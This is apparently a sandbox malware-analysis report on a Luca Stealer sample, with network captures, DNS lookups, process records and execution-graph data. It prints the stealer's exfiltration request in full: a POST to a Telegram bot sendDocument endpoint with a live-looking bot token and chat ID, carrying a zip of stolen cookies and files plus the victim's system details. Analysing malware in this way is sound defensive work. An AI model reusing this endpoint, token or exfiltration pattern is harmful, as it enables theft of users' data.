Dec 13, 2024 12:45:40.493951082 CET | 49704 | 80 | 192.168.2.5 | 108.181.61.49
Dec 13, 2024 12:45:40.614201069 CET | 80 | 49704 | 108.181.61.49 | 192.168.2.5
Dec 13, 2024 12:45:40.614353895 CET | 49704 | 80 | 192.168.2.5 | 108.181.61.49
Dec 13, 2024 12:45:40.615731001 CET | 49704 | 80 | 192.168.2.5 | 108.181.61.49
Dec 13, 2024 12:45:40.735630989 CET | 80 | 49704 | 108.181.61.49 | 192.168.2.5
Dec 13, 2024 12:45:42.282897949 CET | 80 | 49704 | 108.181.61.49 | 192.168.2.5
Dec 13, 2024 12:45:42.288141012 CET | 49704 | 80 | 192.168.2.5 | 108.181.61.49
Dec 13, 2024 12:45:42.409996986 CET | 80 | 49704 | 108.181.61.49 | 192.168.2.5
Dec 13, 2024 12:45:42.410150051 CET | 49704 | 80 | 192.168.2.5 | 108.181.61.49
Dec 13, 2024 12:46:17.292639017 CET | 49761 | 80 | 192.168.2.5 | 108.181.61.49
Dec 13, 2024 12:46:17.412736893 CET | 80 | 49761 | 108.181.61.49 | 192.168.2.5
Dec 13, 2024 12:46:17.412892103 CET | 49761 | 80 | 192.168.2.5 | 108.181.61.49
Dec 13, 2024 12:46:17.413247108 CET | 49761 | 80 | 192.168.2.5 | 108.181.61.49
Dec 13, 2024 12:46:17.533018112 CET | 80 | 49761 | 108.181.61.49 | 192.168.2.5
Dec 13, 2024 12:46:19.076994896 CET | 80 | 49761 | 108.181.61.49 | 192.168.2.5
Dec 13, 2024 12:46:19.077486038 CET | 49761 | 80 | 192.168.2.5 | 108.181.61.49
Dec 13, 2024 12:46:19.198033094 CET | 80 | 49761 | 108.181.61.49 | 192.168.2.5
Dec 13, 2024 12:46:19.198122025 CET | 49761 | 80 | 192.168.2.5 | 108.181.61.49
Dec 13, 2024 12:46:38.411426067 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:38.411489010 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:38.411561012 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:38.439357996 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:38.439378977 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.199309111 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.199461937 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.201653957 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.201667070 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.202011108 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.258244038 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.320436954 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.320573092 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.320683002 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.320734978 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.320821047 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.320843935 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.321027994 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.321103096 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.321120977 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.321346045 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.321379900 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.321407080 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.321460962 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.321513891 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.321544886 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.321614027 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.321640015 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.321662903 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.321790934 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.321824074 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.321841955 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.321852922 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.321932077 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.321952105 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.321968079 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.321974993 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.321990967 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.322010994 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.322050095 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.322062969 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.322065115 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.322073936 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.322081089 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.322087049 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.322151899 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.322163105 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.322179079 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.322192907 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.322206974 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.322236061 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.322236061 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.322256088 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.322262049 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.322274923 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.322315931 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.322318077 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.322408915 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336246967 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336253881 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.336479902 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336493969 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.336566925 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336581945 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.336601019 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336612940 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.336623907 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336636066 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.336704016 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336714029 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.336735010 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336747885 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.336760044 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336771965 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.336812973 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336858034 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336865902 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336888075 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.336935997 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.337024927 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.337044954 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.337063074 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.337142944 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.338593960 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.383337975 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.383651018 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.383713961 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.383737087 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.383760929 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.383783102 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.383790970 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.383800030 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.383841991 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.383865118 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.398765087 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.427335024 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.427515030 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.427598953 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.427625895 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.427639961 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.427654982 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.427679062 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.438369036 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:40.441927910 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.682069063 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:40.683106899 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:43.659843922 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:43.662298918 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Dec 13, 2024 12:46:43.662390947 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:43.664236069 CET | 49813 | 443 | 192.168.2.5 | 149.154.167.220
Dec 13, 2024 12:46:43.664251089 CET | 443 | 49813 | 149.154.167.220 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 12:45:40.349163055 CET | 58653 | 53 | 192.168.2.5 | 1.1.1.1
Dec 13, 2024 12:45:40.489345074 CET | 53 | 58653 | 1.1.1.1 | 192.168.2.5
Dec 13, 2024 12:46:38.273216009 CET | 49514 | 53 | 192.168.2.5 | 1.1.1.1
Dec 13, 2024 12:46:38.410420895 CET | 53 | 49514 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 13, 2024 12:45:40.349163055 CET | 192.168.2.5 | 1.1.1.1 | 0xc690 | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:46:38.273216009 CET | 192.168.2.5 | 1.1.1.1 | 0x70ec | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 13, 2024 12:45:40.489345074 CET | 1.1.1.1 | 192.168.2.5 | 0xc690 | No error (0) | ipwho.is | | 108.181.61.49 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 12:46:38.410420895 CET | 1.1.1.1 | 192.168.2.5 | 0x70ec | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• api.telegram.org
• ipwho.is
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 108.181.61.49 | 80 | 5752 | C:\Users\user\Desktop\888.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 12:45:40.615731001 CET | 59 | OUT | GET /?output=json HTTP/1.1
accept: */*
host: ipwho.is
Dec 13, 2024 12:45:42.282897949 CET | 943 | IN | HTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 11:45:41 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: ipwhois
Access-Control-Allow-Headers: *
X-Robots-Tag: noindex
Data Raw: 32 62 66 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 [TRUNCATED]
Data Ascii: 2bf{"ip":"8.46.123.189","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"CenturyLink Communications, LLC","isp":"Level","domain":""},"timezone":{"id":"America\/New_York","abbr":"EST","is_dst":false,"offset":-18000,"utc":"-05:00","current_time":"2024-12-13T06:45:41-05:00"}}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49761 | 108.181.61.49 | 80 | 5752 | C:\Users\user\Desktop\888.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 12:46:17.413247108 CET | 59 | OUT | GET /?output=json HTTP/1.1
accept: */*
host: ipwho.is
Dec 13, 2024 12:46:19.076994896 CET | 943 | IN | HTTP/1.1 200 OK
Date: Fri, 13 Dec 2024 11:46:18 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: ipwhois
Access-Control-Allow-Headers: *
X-Robots-Tag: noindex
Data Raw: 32 62 66 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 4e 59 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 31 32 37 38 33 37 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 35 39 34 31 33 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 31 30 30 30 30 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 [TRUNCATED]
Data Ascii: 2bf{"ip":"8.46.123.189","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"New York","region_code":"NY","city":"New York","latitude":40.7127837,"longitude":-74.0059413,"is_eu":false,"postal":"10000","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":3356,"org":"CenturyLink Communications, LLC","isp":"Level","domain":""},"timezone":{"id":"America\/New_York","abbr":"EST","is_dst":false,"offset":-18000,"utc":"-05:00","current_time":"2024-12-13T06:46:18-05:00"}}0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549813149.154.167.2204435752C:\Users\user\Desktop\888.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-13 11:46:40 UTC1277OUTPOST /bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-1001562112668&caption=%3Ccode%3E%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20PGUZEPW%20(1280,%201024)%0AHWID:%208671303959770644%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\888.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0ATelegram:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags% [TRUNCATED]
                                                                          content-type: multipart/form-data; boundary=e8be572a4f1ca459-17be1c6bd1e7ca5e-9d6aa1bcf33cfc16-07b6deb476f0c378
                                                                          content-length: 888104
                                                                          accept: */*
                                                                          host: api.telegram.org
2024-12-13 11:46:40 UTC 15107 OUT Data Ascii: --e8be572a4f1ca459-17be1c6bd1e7ca5e-9d6aa1bcf33cfc16-07b6deb476f0c378 Content-Disposition: form-data; name="document"; filename="[US]_8.46.123.189_user-PC.zip" Content-Type: application/zip PKeYAutofill/PKeY
2024-12-13 11:46:43 UTC 389 IN HTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Fri, 13 Dec 2024 11:46:43 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 1227
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

                                                                          Target ID:0
                                                                          Start time:06:45:39
                                                                          Start date:13/12/2024
                                                                          Path:C:\Users\user\Desktop\888.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\888.exe"
                                                                          Imagebase:0xf90000
                                                                          File size:4'885'504 bytes
                                                                          MD5 hash:B6E5859C20C608BF7E23A9B4F8B3B699
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000002.2711187553.0000000000974000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000002.2711187553.000000000099B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2710106623.000000000099B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000002.2711570869.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2709905866.000000000099B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2710305791.000000000099B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2710305791.0000000000973000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2710106623.000000000095D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2710587236.000000000099B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.2709905866.000000000094F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:06:46:18
                                                                          Start date:13/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                                                                          Imagebase:0x9a0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:06:46:18
                                                                          Start date:13/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                            Execution Graph

                                                                            Execution Coverage:2.5%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:13.7%
                                                                            Total number of Nodes:628
                                                                            Total number of Limit Nodes:4
11be906 2349->2350 2352 11be87f 2349->2352 2351 12e6bb0 76 API calls 2350->2351 2351->2352 2353 11be8ea ReleaseSRWLockExclusive 2352->2353 2354 12e6bb0 76 API calls 2352->2354 2353->1931 2355 11be921 2354->2355 2355->2353 2357 11b1359 2356->2357 2358 12dc040 78 API calls 2357->2358 2359 11b1405 2358->2359 2361 11b1434 2359->2361 2364 11a6f30 2361->2364 2365 11a6f4e 2364->2365 2366 11a738d 2365->2366 2368 12dbfe0 78 API calls 2365->2368 2369 11a728f 2365->2369 2375 11a72ae 2365->2375 2367 12dbf20 78 API calls 2366->2367 2366->2375 2367->2369 2368->2366 2370 12dbf20 78 API calls 2369->2370 2373 11a73c9 2369->2373 2369->2375 2370->2373 2371 12dbf20 78 API calls 2372 11a752e 2371->2372 2376 11a7543 2372->2376 2373->2371 2373->2375 2378 11a7742 2376->2378 2385 11a7554 2376->2385 2377 11a7767 2377->2378 2379 12dbf20 78 API calls 2377->2379 2380 11a787a 2379->2380 2381 12dbfe0 78 API calls 2380->2381 2383 11a7888 2381->2383 2382 12dbf20 78 API calls 2382->2377 2384 12dbf20 78 API calls 2383->2384 2386 11a7659 2384->2386 2385->2377 2385->2378 2385->2382 2385->2386 2386->2378 2387 12dbf20 78 API calls 2386->2387 2388 11a78a7 2387->2388 2390 12e6470 2389->2390 2391 12e6695 2390->2391 2392 12e64a0 2390->2392 2393 12e66cc 2390->2393 2395 12e64c3 2390->2395 2398 12e64e7 TlsGetValue 2390->2398 2401 12e651d TlsGetValue 2390->2401 2403 12e6800 75 API calls 2390->2403 2405 12e6530 2390->2405 2406 fb1220 3 API calls 2390->2406 2407 11a1b80 75 API calls 2390->2407 2408 12e6734 2390->2408 2410 12e66dd 2390->2410 2411 12e6660 2390->2411 2413 11a2260 HeapFree HeapFree 2390->2413 2416 12e657b TlsSetValue 2390->2416 2394 12e66b7 2391->2394 2397 12dbef0 75 API calls 2392->2397 2393->1996 2438 11a20b0 2394->2438 2399 12dc040 75 API calls 2395->2399 2397->2395 2398->2390 2400 12e6798 2399->2400 2402 12e67b7 2400->2402 2404 11a2260 2 API calls 2400->2404 2401->2390 2402->1996 2403->2390 2404->2402 2452 12dc380 2405->2452 2406->2390 2407->2390 2412 12dbae0 75 API calls 2408->2412 2414 12dbef0 
